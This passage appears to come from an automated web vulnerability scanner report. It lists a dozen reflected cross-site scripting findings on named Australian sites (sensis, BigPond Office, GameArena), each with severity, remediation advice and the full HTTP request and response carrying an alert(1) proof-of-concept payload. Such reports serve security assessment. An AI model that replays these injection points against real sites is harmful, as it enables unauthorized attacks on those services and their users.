2.714. http://media.sensis.com.au/jserver/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /jserver/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4e94'-alert(1)-'912c3b5c3b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jserver/acc_randomc4e94'-alert(1)-'912c3b5c3b9=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://medrx.sensis.com.au/images/sensis/cookieFix.html?acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:01 GMT
X-DirectServer: DS1
Content-Type: application/x-javascript
Content-Length: 1589
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

document.writeln("<iframe src=\"http://view.atdmt.com/2D1/iview/snssmdva00100002822d1/direct;wi.300;hi.250/01?rand=&click=http://media.sensis.com.au/ADCLICK/CID=0000c3161f45920200000000/acc_randomc4e9
...[SNIP]...
<a href="http://media.sensis.com.au/ADCLICK/CID=0000c3161f45920200000000/acc_randomc4e94'-alert(1)-'912c3b5c3b9=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415/relocate=http://clk.redcated/2D1/go/snssmdva00100002822d1/direct
...[SNIP]...

2.715. http://media.sensis.com.au/jserver/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /jserver/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5e52'-alert(1)-'9e3ac9feb9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jserver/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415?b5e52'-alert(1)-'9e3ac9feb9c=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://medrx.sensis.com.au/images/sensis/cookieFix.html?acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:11:47 GMT
X-DirectServer: DS2
Content-Type: application/x-javascript
Content-Length: 1658
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

document.writeln("<iframe src=\"http://view.atdmt.com/2D1/iview/snssmdva00100002822d1/direct;wi.300;hi.250/01?rand=951172862928&click=http://media.sensis.com.au/ADCLICK/CID=0000c3161f45920200000000/ac
...[SNIP]...
dia.sensis.com.au/ADCLICK/CID=0000c3161f45920200000000/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415?b5e52'-alert(1)-'9e3ac9feb9c=1&relocate=http://clk.redcated/2D1/go/snssmdva00100002822d1/direct;wi.300;hi.250/01/951172862928/" target="_blank">
...[SNIP]...

2.716. http://media.sensis.com.au/jserver/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /jserver/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb696'-alert(1)-'1030d1f6ae2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jserverfb696'-alert(1)-'1030d1f6ae2/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://ad.sensismediasmart.com.au/images/sensis/cookieFix.html?acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5; LE1=wyowC1+4mX6+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:29 GMT
X-DirectServer: DS1
Content-Type: application/x-javascript
Content-Length: 1850
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<!--Begin JSERVER Skip-->

document.write('<scr'+'ipt src="http://ad.au.vulnerable.ad.partner/adj/N3197.br_Mediasmart/B5029385.3;sz=300x250;click=http://media.sensis.com.au/ADCLICK/CID=0003427ea649cbdb00000000fb696'-alert(1)-'1030d1f6ae2/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373/relocate=;click=http://media.sensis.com.au/ADCLICK/CID
...[SNIP]...

2.717. http://media.sensis.com.au/jserver/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /jserver/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e858'-alert(1)-'c78a48c661c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jserver/acc_random7e858'-alert(1)-'c78a48c661c=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://ad.sensismediasmart.com.au/images/sensis/cookieFix.html?acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5; LE1=wyowC1+4mX6+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:36 GMT
X-DirectServer: DS3
Content-Type: application/x-javascript
Content-Length: 1814
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<!--Begin JSERVER Skip-->

document.write('<scr'+'ipt src="http://ad.au.vulnerable.ad.partner/adj/N3197.br_Mediasmart/B5029385.3;sz=300x250;click=http://media.sensis.com.au/ADCLICK/CID=0003427ea649cbdb00000000/acc_random7e858'-alert(1)-'c78a48c661c=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373/relocate=;click=http://media.sensis.com.au/ADCLICK/CID=0003427ea6
...[SNIP]...

2.718. http://media.sensis.com.au/jserver/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /jserver/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3faea'-alert(1)-'a3a4f4e6edd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jserver/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373?3faea'-alert(1)-'a3a4f4e6edd=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://ad.sensismediasmart.com.au/images/sensis/cookieFix.html?acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5; LE1=wyowC1+4mX6+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:22 GMT
X-DirectServer: DS1
Content-Type: application/x-javascript
Content-Length: 1865
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<!--Begin JSERVER Skip-->

document.write('<scr'+'ipt src="http://ad.au.vulnerable.ad.partner/adj/N3197.br_Mediasmart/B5029385.3;sz=300x250;click=http://media.sensis.com.au/ADCLICK/CID=0003427ea649cbdb00000000/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373?3faea'-alert(1)-'a3a4f4e6edd=1&relocate=;click=http://media.sensis.com.au/ADCLICK/CID=0003427ea649cbdb00000000/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITI
...[SNIP]...

2.719. http://www.bigpondoffice.com.au/common/main.tfo [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bigpondoffice.com.au
Path:   /common/main.tfo

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68b33<script>alert(1)</script>b13de12fc76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common68b33<script>alert(1)</script>b13de12fc76/main.tfo HTTP/1.1
Host: www.bigpondoffice.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Invalid path /common68b33&lt;script&gt;alert(1)&lt;/script&gt;b13de12fc76/main was requested
Date: Tue, 23 Nov 2010 02:54:45 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.25
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD AI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI'
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 2460


<html lang="en">
<head>
<title>BigPond Office ... The ultimate Office suite</title>
<link rel="stylesheet" type="text/css" href="/css/common.css">
   <script langua
...[SNIP]...
<b>/common68b33<script>alert(1)</script>b13de12fc76/main.tfo</b>
...[SNIP]...

2.720. http://www.gamearena.com.au/news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamearena.com.au
Path:   /news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 13b1b'><script>alert(1)</script>dd03f420596 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/?13b1b'><script>alert(1)</script>dd03f420596=1 HTTP/1.1
Host: www.gamearena.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:55:32 GMT
Server: Apache
Set-Cookie: ga_sessionid=GUfGGAcwlauJewXLWqbUnVb5Lf; expires=Thu, 23-Dec-2010 02:55:32 GMT; path=/; domain=.gamearena.com.au; httponly
Set-Cookie: MMSessID=1frr6nk3ka6o5eheoo0rhq1bh7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 124659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:fb="http://www.face
...[SNIP]...
<a class="pageLink" href='/news/?13b1b'><script>alert(1)</script>dd03f420596=1&p=2'>
...[SNIP]...

2.721. http://www.gamearena.com.au/shop/games/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamearena.com.au
Path:   /shop/games/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c467'><script>alert(1)</script>b78c9ab4d73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/games/?9c467'><script>alert(1)</script>b78c9ab4d73=1 HTTP/1.1
Host: www.gamearena.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:55:33 GMT
Server: Apache
Set-Cookie: ga_sessionid=GUncg3rw41AxnMWCSM3ldDzqZS; expires=Thu, 23-Dec-2010 02:55:33 GMT; path=/; domain=.gamearena.com.au; httponly
Set-Cookie: MMSessID=2tjj97s27167amj59er4h1fl71; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: promo_light_box_campfire-legends-the-babysitter=1; expires=Thu, 23-Dec-2010 02:55:33 GMT; path=/; domain=gamearena.com.au
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 101487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:fb="http://www.face
...[SNIP]...
<a class="pageLink"onclick="BrowseTitles('games',2,'all','latest','','18','3'); return false;" href='/shop/games/?9c467'><script>alert(1)</script>b78c9ab4d73=1&p=2'>
...[SNIP]...

2.722. http://www.gamearena.com.au/shop/games/title/hearts-medicine-season-one/index.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamearena.com.au
Path:   /shop/games/title/hearts-medicine-season-one/index.php

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec910'-alert(1)-'dec01b893fd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shop/games/title/hearts-medicine-season-one/index.phpec910'-alert(1)-'dec01b893fd HTTP/1.1
Host: www.gamearena.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:56:06 GMT
Server: Apache
Set-Cookie: ga_sessionid=GUCgLnhLSFsTgDyqVtIyTLsKCm; expires=Thu, 23-Dec-2010 02:56:06 GMT; path=/; domain=.gamearena.com.au; httponly
Set-Cookie: MMSessID=squ4puufk05tidv3s991h3f5o6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 106514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:fb="http://www.face
...[SNIP]...
<script language="JavaScript">
           DownloaderController.Init('DownloaderNotInstalled', false, 'bpd://secure.gamearena.com.au/shop/games/title/hearts-medicine-season-one/index.phpec910'-alert(1)-'dec01b893fd?PerformBpdDownload=1&hmac=cffebdbb29b506c4649eb277af8b23378494224e&ts=1290480966&userid=0', 'gamearena.com.au');        </script>
...[SNIP]...

2.723. http://www.gamearena.com.au/shop/games/title/hearts-medicine-season-one/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamearena.com.au
Path:   /shop/games/title/hearts-medicine-season-one/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e692b'-alert(1)-'fea3d3cefb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shop/games/title/hearts-medicine-season-one/index.php?e692b'-alert(1)-'fea3d3cefb9=1 HTTP/1.1
Host: www.gamearena.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:55:38 GMT
Server: Apache
Set-Cookie: ga_sessionid=GUvGArmxVvfchPb9wdpM6VAfTR; expires=Thu, 23-Dec-2010 02:55:38 GMT; path=/; domain=.gamearena.com.au; httponly
Set-Cookie: MMSessID=3qdlfvla1no89i2gk2cq677dl3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 106519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:fb="http://www.face
...[SNIP]...
<script language="JavaScript">
           DownloaderController.Init('DownloaderNotInstalled', false, 'bpd://secure.gamearena.com.au/shop/games/title/hearts-medicine-season-one/index.php?PerformBpdDownload=1&e692b'-alert(1)-'fea3d3cefb9=1&hmac=2bda8e40f05f76f860956036791e4f8964bd3aed&ts=1290480938&userid=0', 'gamearena.com.au');        </script>
...[SNIP]...

2.724. http://www.gamearena.com.au/shop/games/title/secret-diaries-florence-ashford/index.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamearena.com.au
Path:   /shop/games/title/secret-diaries-florence-ashford/index.php

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f1d8'-alert(1)-'20c53a0686d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shop/games/title/secret-diaries-florence-ashford/index.php7f1d8'-alert(1)-'20c53a0686d HTTP/1.1
Host: www.gamearena.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:56:06 GMT
Server: Apache
Set-Cookie: ga_sessionid=GUMTMAnFAkA2YVbBxLKRPPG9rH; expires=Thu, 23-Dec-2010 02:56:06 GMT; path=/; domain=.gamearena.com.au; httponly
Set-Cookie: MMSessID=60h4c0ilgv18ikol8n199i89j6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 106394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:fb="http://www.face
...[SNIP]...
<script language="JavaScript">
           DownloaderController.Init('DownloaderNotInstalled', false, 'bpd://secure.gamearena.com.au/shop/games/title/secret-diaries-florence-ashford/index.php7f1d8'-alert(1)-'20c53a0686d?PerformBpdDownload=1&hmac=03d949fa288f94b5e736de8edc053b1944b1926d&ts=1290480966&userid=0', 'gamearena.com.au');        </script>
...[SNIP]...

2.725. http://www.gamearena.com.au/shop/games/title/secret-diaries-florence-ashford/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamearena.com.au
Path:   /shop/games/title/secret-diaries-florence-ashford/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61ab5'-alert(1)-'95d0a350b7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shop/games/title/secret-diaries-florence-ashford/index.php?61ab5'-alert(1)-'95d0a350b7d=1 HTTP/1.1
Host: www.gamearena.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:55:38 GMT
Server: Apache
Set-Cookie: ga_sessionid=GUgp4Fk23gyxatdQfsJY4FWq53; expires=Thu, 23-Dec-2010 02:55:38 GMT; path=/; domain=.gamearena.com.au; httponly
Set-Cookie: MMSessID=oesuavsbq4a8ongqjco64dg9a7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 106399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:fb="http://www.face
...[SNIP]...
<script language="JavaScript">
